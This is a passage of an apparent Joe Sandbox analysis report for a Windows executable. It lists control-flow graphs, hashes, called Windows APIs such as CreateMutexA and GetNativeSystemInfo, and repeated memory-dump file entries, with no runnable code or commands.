                                                                                                                                                                                                        • Opcode ID: 948b14f19cfb975881b4780cdd650966e723cd6316dc8078b184d5aaf7295837
                                                                                                                                                                                                        • Instruction ID: 45e2ebda64c696a819dd11a1b264080abc5ec9209afceced131a20b1a808c8e2
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 948b14f19cfb975881b4780cdd650966e723cd6316dc8078b184d5aaf7295837
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0C216D71258200CBFB2467E89986BBDB353EFC1304F244D1EE508F73D6CA7A59818A93

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 468 66a34f-66a35b 469 66a371-66a39a call 67d663 468->469 470 66a35d-66a36b 468->470 476 66a39c-66a3a8 469->476 477 66a3c8-66a916 call 6780c0 469->477 470->469 471 66a93a 470->471 473 66a953-66a994 Sleep CreateMutexA 471->473 474 66a93a call 696c6a 471->474 482 66a996-66a998 473->482 483 66a9a7-66a9a8 473->483 474->473 478 66a3be-66a3c5 call 67d663 476->478 479 66a3aa-66a3b8 476->479 478->477 479->471 479->478 482->483 486 66a99a-66a9a5 482->486 486->483
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNEL32(00000064), ref: 0066A963
                                                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,006C3254), ref: 0066A981
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.268881224962.0000000000661000.00000040.00000001.01000000.00000003.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881159750.0000000000660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881224962.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881428812.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881494212.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881563416.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881936611.0000000000836000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882002715.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882082303.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882148117.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882216423.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882216423.000000000085C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882294346.000000000085F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882325046.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882368787.0000000000862000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882399080.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882430149.0000000000864000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882464300.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882493312.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882522058.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882555423.000000000086F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882587428.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882633917.0000000000889000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882665288.000000000088B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882693750.000000000088C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882723575.000000000088D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882748482.000000000088E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882779239.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882809788.0000000000895000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882843328.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882883171.000000000089E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882928228.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882983295.00000000008B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883015972.00000000008BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883054349.00000000008C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883087341.00000000008C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883118586.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883166835.00000000008D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883196548.00000000008D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883226192.00000000008D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883275775.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883306152.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883336882.00000000008EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883368208.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883405036.00000000008FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883434356.00000000008FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883434356.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883548086.000000000094E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883576832.000000000094F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883608621.0000000000967000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883635943.0000000000968000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883662196.0000000000969000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883693841.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883742504.000000000096F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883778624.000000000097D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883809678.000000000097E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_660000_file.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID: T2l
                                                                                                                                                                                                        • API String ID: 1464230837-1031808636
                                                                                                                                                                                                        • Opcode ID: e3b218bdb4b493a19f4ef57909169cda248bd8fcec5dd94d12e95286153a2ce7
                                                                                                                                                                                                        • Instruction ID: 6495876fb16f3c6b9aaa45ce393f4387556f369ce19500a7d368fe2fa6823856
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e3b218bdb4b493a19f4ef57909169cda248bd8fcec5dd94d12e95286153a2ce7
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C7213732614200DBEB189BA8DD85B6CB763EFD1310F34861DE508F77D9D776AA808B52

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 672 667d30-667db2 call 6940f0 676 668356-668373 call 67cff1 672->676 677 667db8-667de0 call 677a00 call 665c10 672->677 684 667de4-667e06 call 677a00 call 665c10 677->684 685 667de2 677->685 690 667e0a-667e23 684->690 691 667e08 684->691 685->684 694 667e54-667e7f 690->694 695 667e25-667e34 690->695 691->690 698 667eb0-667ed1 694->698 699 667e81-667e90 694->699 696 667e36-667e44 695->696 697 667e4a-667e51 call 67d663 695->697 696->697 702 668374 call 696c6a 696->702 697->694 700 667ed7-667edc 698->700 701 667ed3-667ed5 GetNativeSystemInfo 698->701 704 667ea6-667ead call 67d663 699->704 705 667e92-667ea0 699->705 707 667edd-667ee6 700->707 701->707 714 668379-66837f call 696c6a 702->714 704->698 705->702 705->704 712 667f04-667f07 707->712 713 667ee8-667eef 707->713 717 6682f7-6682fa 712->717 718 667f0d-667f16 712->718 715 667ef5-667eff 713->715 716 668351 713->716 720 66834c 715->720 716->676 717->716 723 6682fc-668305 717->723 721 667f18-667f24 718->721 722 667f29-667f2c 718->722 720->716 721->720 725 6682d4-6682d6 722->725 726 667f32-667f39 722->726 727 668307-66830b 723->727 728 66832c-66832f 723->728 731 6682e4-6682e7 725->731 732 6682d8-6682e2 725->732 733 667f3f-667f9b call 677a00 call 665c10 call 677a00 call 665c10 call 665d50 726->733 734 668019-6682bd call 677a00 call 665c10 call 677a00 call 665c10 call 665d50 call 677a00 call 665c10 call 665730 call 677a00 call 665c10 call 677a00 call 665c10 call 665d50 call 677a00 call 665c10 call 665730 call 677a00 call 665c10 call 677a00 call 665c10 call 665d50 call 677a00 call 665c10 call 665730 call 677a00 call 665c10 call 677a00 call 665c10 call 665d50 call 677a00 call 665c10 call 665730 726->734 735 668320-66832a 727->735 736 66830d-668312 727->736 729 668331-66833b 728->729 730 66833d-668349 728->730 729->716 730->720 731->716 740 6682e9-6682f5 731->740 732->720 757 667fa0-667fa7 733->757 770 6682c3-6682cc 734->770 735->716 736->735 738 668314-66831e 736->738 738->716 740->720 760 667fab-667fcb call 698bbe 757->760 761 667fa9 757->761 767 668002-668004 760->767 768 667fcd-667fdc 760->768 761->760 767->770 771 66800a-668014 767->771 772 667ff2-667fff call 67d663 768->772 773 667fde-667fec 768->773 770->717 776 6682ce 770->776 771->770 772->767 773->714 773->772 776->725
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00667ED3
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.268881224962.0000000000661000.00000040.00000001.01000000.00000003.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881159750.0000000000660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881224962.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881428812.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881494212.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881563416.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881936611.0000000000836000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882002715.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882082303.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882148117.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882216423.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882216423.000000000085C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882294346.000000000085F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882325046.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882368787.0000000000862000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882399080.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882430149.0000000000864000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882464300.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882493312.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882522058.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882555423.000000000086F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882587428.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882633917.0000000000889000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882665288.000000000088B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882693750.000000000088C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882723575.000000000088D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882748482.000000000088E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882779239.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882809788.0000000000895000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882843328.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882883171.000000000089E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882928228.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882983295.00000000008B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883015972.00000000008BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883054349.00000000008C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883087341.00000000008C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883118586.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883166835.00000000008D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883196548.00000000008D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883226192.00000000008D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883275775.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883306152.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883336882.00000000008EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883368208.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883405036.00000000008FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883434356.00000000008FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883434356.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883548086.000000000094E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883576832.000000000094F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883608621.0000000000967000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883635943.0000000000968000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883662196.0000000000969000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883693841.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883742504.000000000096F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883778624.000000000097D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883809678.000000000097E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_660000_file.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InfoNativeSystem
                                                                                                                                                                                                        • String ID: Wce
                                                                                                                                                                                                        • API String ID: 1721193555-518726228
                                                                                                                                                                                                        • Opcode ID: 2595da96b9838413c646685fc4bbb21140bc8986f6933772c9478523cd2d2a1f
                                                                                                                                                                                                        • Instruction ID: f715f1ed8fb0eaeaf75877f0dad8600386b1b738c9ed7350dacc17bfa2f964ad
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2595da96b9838413c646685fc4bbb21140bc8986f6933772c9478523cd2d2a1f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B1E10670E002449BDB64BB78CC177AD7A63AB41724F94429CE8196B3C2DF354F958BC6
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CoInitialize.OLE32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0066B3C7
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.268881224962.0000000000661000.00000040.00000001.01000000.00000003.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881159750.0000000000660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881224962.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881428812.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881494212.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881563416.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881936611.0000000000836000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882002715.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882082303.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882148117.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882216423.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882216423.000000000085C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882294346.000000000085F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882325046.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882368787.0000000000862000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882399080.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882430149.0000000000864000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882464300.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882493312.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882522058.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882555423.000000000086F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882587428.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882633917.0000000000889000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882665288.000000000088B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882693750.000000000088C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882723575.000000000088D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882748482.000000000088E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882779239.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882809788.0000000000895000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882843328.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882883171.000000000089E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882928228.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882983295.00000000008B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883015972.00000000008BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883054349.00000000008C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883087341.00000000008C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883118586.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883166835.00000000008D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883196548.00000000008D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883226192.00000000008D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883275775.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883306152.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883336882.00000000008EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883368208.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883405036.00000000008FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883434356.00000000008FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883434356.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883548086.000000000094E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883576832.000000000094F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883608621.0000000000967000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883635943.0000000000968000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883662196.0000000000969000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883693841.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883742504.000000000096F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883778624.000000000097D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883809678.000000000097E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_660000_file.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Initialize
                                                                                                                                                                                                        • String ID: Wce
                                                                                                                                                                                                        • API String ID: 2538663250-518726228
                                                                                                                                                                                                        • Opcode ID: 40517b0633c9eb6f37f7fb5bac67ae9ce65c6c5f7a1b049a4ecb98b4f3dd57e5
                                                                                                                                                                                                        • Instruction ID: 24d59a883db2717ba45619a09cfc541c246d5417557bee7ba762e0f7fd60ec10
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 40517b0633c9eb6f37f7fb5bac67ae9ce65c6c5f7a1b049a4ecb98b4f3dd57e5
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 66B11670A10268DFEB68CF14CD94BDEB7B6EF45304F5085D8E40AA7281D775AA88CF90
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0069A813,00000001,00000364,00000006,000000FF,?,0069EE3F,?,00000004,00000000,?,?), ref: 0069D870
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.268881224962.0000000000661000.00000040.00000001.01000000.00000003.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881159750.0000000000660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881224962.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881428812.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881494212.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
